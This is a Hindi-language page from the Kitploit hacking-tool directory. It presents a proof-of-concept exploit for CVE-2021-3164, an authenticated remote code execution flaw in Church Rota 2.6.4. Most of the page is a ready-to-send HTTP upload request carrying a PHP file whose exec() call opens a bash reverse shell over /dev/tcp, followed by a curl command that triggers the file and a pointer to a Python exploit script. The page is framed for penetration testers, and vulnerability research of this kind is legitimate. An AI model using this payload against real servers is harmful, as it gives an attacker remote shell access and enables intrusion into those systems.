Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve-2021-3164 — Church Rota संस्करण 2.6.4 प्रमाणित रिमोट कोड निष्पादन (authenticated remote code execution) के प्रति संवेदनशील है। उपयोगकर्ता को किसी मनमानी फ़ाइल को अपलोड और निष्पादित करने के लिए फ़ाइल अपलोड अनुमति की आवश्यकता नहीं होती है। एप्लिकेशन मुख्य रूप से PHP में लिखा गया है, इसलिए हम अपने PoC में PHP का उपयोग करते हैं। | Kitploit
उपकरण/GitHubGitHub/rmccarth/cve-2021-3164
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubrmccarth/cve-2021-3164

cve-2021-3164

रिपॉजिटरी देखें
25 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

विवरण

Church Rota संस्करण 2.6.4 प्रमाणित रिमोट कोड निष्पादन (authenticated remote code execution) के प्रति संवेदनशील है। उपयोगकर्ता को किसी मनमानी फ़ाइल को अपलोड और निष्पादित करने के लिए फ़ाइल अपलोड अनुमति की आवश्यकता नहीं होती है। एप्लिकेशन मुख्य रूप से PHP में लिखा गया है, इसलिए हम अपने PoC में PHP का उपयोग करते हैं।

साझा करें

Church Rota संस्करण 2.6.4 प्रमाणित रिमोट कोड निष्पादन (authenticated remote code execution) के प्रति संवेदनशील है। किसी मनमानी फ़ाइल को अपलोड और निष्पादित करने के लिए उपयोगकर्ता के पास फ़ाइल अपलोड अनुमति होना आवश्यक नहीं है।

Church Rota में लॉग इन करने के बाद, निम्नलिखित अनुरोध भेजें, अपने PHPSESSID से प्रतिस्थापित करें:

root@kitploit:~
POST /resources.php?action=newsent HTTP/1.1

Host: localhost:8081

User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:84.0) Gecko/20100101 Firefox/84.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: multipart/form-data; boundary=---------------------------78920178725041013532564196488

Content-Length: 571

Origin: http://localhost:8081

Connection: close

Referer: http://localhost:8081/resources.php?action=new

Cookie: PHPSESSID=ivaa0ck3snt9ajlm0od9d7lh4j

Upgrade-Insecure-Requests: 1

-----------------------------78920178725041013532564196488

Content-Disposition: form-data; name="resourcename"

exec

-----------------------------78920178725041013532564196488

Content-Disposition: form-data; name="resourcefile"; filename="exec.php"

Content-Type: text/plain

<?php

exec("/bin/bash -c 'bash -i > /dev/tcp/127.0.0.1/1234 0>&1'");

?>


-----------------------------78920178725041013532564196488

Content-Disposition: form-data; name="resourcedescription"



<p>text file upload</p>

-----------------------------78920178725041013532564196488--

फ़ाइल को फिर निम्नलिखित के साथ निष्पादित किया जा सकता है:

root@kitploit:~
curl localhost:80/documents/exec.php

या वेब UI में 'resources' के अंतर्गत फ़ाइल पर क्लिक करके।

या बस pwntools और requests इंस्टॉल करें और फिर दिए गए cve-2021-3164.py एक्सप्लॉइट स्क्रिप्ट को सेटअप और रन करें।

टूल डाउनलोड करें